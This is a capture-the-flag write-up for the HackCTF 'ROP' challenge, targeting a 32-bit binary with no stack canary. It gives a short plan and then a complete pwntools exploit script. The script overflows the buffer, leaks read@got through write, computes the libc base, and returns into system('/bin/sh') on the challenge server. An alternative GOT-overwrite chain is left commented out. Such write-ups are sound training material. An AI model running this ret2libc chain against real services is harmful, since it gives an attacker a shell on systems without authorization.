[HackCTF] ROP Writeup (300p)

Writeup

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)


The program takes input, prints Hello, World!, and then exits.


Since the challenge is labeled ROP, it looks like a textbook ROP problem.

It is 32-bit ROP, so the problem can be solved by using read and write appropriately.

1. Leak read@got using write

2. Use read to write /bin/sh into the .bss section

3. Use read to overwrite write@got

Or:

1. Leak read@got using write

2. Compute the libc base and call system


from pwn import *

context.log_level = 'debug'
p = remote('ctf.j0n9hyun.xyz', 3021)
e = ELF('./rop')
libc = ELF('./libc.so.6')

read_plt = e.plt['read']
read_got = e.got['read']
write_plt = e.plt['write']
write_got = e.got['write']
pppr = 0x8048509  # pop; pop; pop; ret gadget used to clean up the three arguments
bss = e.get_section_by_name('.bss').header.sh_addr  # keep as an integer, not a hex() string, so p32() works

# Stage 1: fill the 0x88-byte buffer and the saved ebp, then call
# write(1, read@got, 4) to leak the resolved address of read, and return to main.
payload = b'A'*0x88 + b'B'*4

payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)
payload += p32(e.symbols['main'])
# Alternative chain (unused): read(0, bss, 4) to place /bin/sh in .bss,
# read(0, write_got, 4) to overwrite write@got, then call write@plt.
#payload += p32(read_plt)
#payload += p32(pppr)
#payload += p32(0)
#payload += p32(bss)
#payload += p32(4)

#payload += p32(read_plt)
#payload += p32(pppr)
#payload += p32(0)
#payload += p32(write_got)
#payload += p32(4)

#payload += p32(write_plt)

p.send(payload)

# Compute the libc base from the leaked read address, then system and "/bin/sh".
leak = u32(p.recv(4))
base = leak - libc.symbols['read']
system = base + libc.symbols['system']
binsh = base + next(libc.search(b'/bin/sh'))

print(hex(base))
print(hex(system))
print(hex(binsh))

# Stage 2: main runs again; return into system("/bin/sh").
# The 4 bytes of 'A' are system's (unused) return address.
payload = b'A'*0x88 + b'B'*4
payload += p32(system)
payload += b'A'*4
payload += p32(binsh)

p.send(payload)
p.interactive()
